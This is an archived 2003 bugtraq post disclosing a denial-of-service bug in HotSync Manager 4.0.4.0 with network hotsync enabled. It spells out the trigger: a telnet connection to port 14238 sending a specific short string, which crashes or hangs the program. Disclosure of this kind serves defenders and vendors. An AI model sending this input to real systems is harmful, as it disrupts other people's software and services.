[28584] in bugtraq
DoS in Hotsync Manager (with network hotsync enabled)
daemon@ATHENA.MIT.EDU (Gary H. Jones II)
Thu Jan 23 14:02:39 2003
Message-ID: <000901c2c27d$fd96e360$a801a8c0@eniac>
From: "Gary H. Jones II" <gary@pointblanksecurity.com>
To: <bugtraq@securityfocus.com>
Date: Wed, 22 Jan 2003 20:23:09 -0500
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Tested with HotSync Manager version 4.0.4.0
If you connect to the port HotSync Manager listens on for a network =
request
telnet 127.0.0.1 14238
And send the data "OK ATDT<" followed by CRLF
A message will appear
"Out of memory. Please free some memory, then choose retry"
It will give you option for abort, retry, ignore.
If you choose ignore, or retry, Hotsync Manager will just hang until the =
process is terminated.
If you choose abort, you get "Runtime Error!" abnormal program =
termination, and it will close.
I haven't seen this particular type of DoS on HotSync Manager anywhere.
Regards,
Gary H. Jones II
Point Blank Security
www.pointblanksecurity.com
